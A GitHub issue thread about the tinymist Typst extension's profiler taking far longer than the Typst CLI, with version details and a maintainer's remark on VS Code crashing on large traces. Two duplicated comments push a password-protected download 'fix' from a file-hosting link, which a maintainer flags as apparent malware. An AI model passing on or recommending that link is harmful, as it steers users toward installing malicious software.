### ISSUE TITLE
 Profiling takes an excessive amount of time

### ISSUE THREAD

**Issue by hooyuser** [Myriad-Dreamin/tinymist#572]
**Describe the bug**
When I try to profile a Typst document, the profiling process takes an excessively long time to complete. For my specific project [debug.zip](https://github.com/user-attachments/files/16755879/debug.zip), after clicking the profile button, the message `Collecting trace... s` appears, and I've waited for over 15 minutes, but it never completes.

For comparison, running the same document through the command line with `typst compile debug.typ --font-path fonts --timings` completes in about 10 seconds.

Interestingly, when profiling smaller files, the process does complete, but it still takes significantly longer than using the CLI. For instance, I trimmed down the content of my original document and tested the profiling again. The profiling showed `Collecting trace... 7s` before the Perfetto page appeared and began reading the profile results. However, running the trimmed document with `typst compile debug_trimmed.typ --font-path fonts --timings` took only about 1 second in the CLI.

**Package/Software version:**

VSCode version(Help -> About):
```plain
Version: 1.92.2 (user setup)
Commit: fee1edb8d6d72a0ddff41e5f71a671c23ed924b9
Date: 2024-08-14T17:29:30.058Z
Electron: 30.1.2
ElectronBuildId: 9870757
Chromium: 124.0.6367.243
Node.js: 20.14.0
V8: 12.4.254.20-electron.0
OS: Windows_NT x64 10.0.19045
```

tinymist extension version: `v0.11.1`. Get it by `tinymist --version` in terminal.
```plain
tinymist
Build Timestamp:     2024-08-26T16:23:08.361428700Z
Build Git Describe:  v0.11.20
Commit SHA:          1f9a42c2e863f6b1fe8624da796e47adf44a9a83
Commit Date:         None
Commit Branch:       None
Cargo Target Triple: x86_64-pc-windows-msvc
Typst Version:       0.11.1
```

**Logs:**

tinymist server log(Output Panel -> tinymist):
[tinymist_log.txt](https://github.com/user-attachments/files/16755658/tinymist_log.txt)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Enter-tainer** [comment]
pls kindly ignore comments above. it looks like malware

**Comment by Myriad-Dreamin** [comment]
I also found vscode will crash if it is sending a trace that is > 511MB. We perhaps may send trace via http  instead
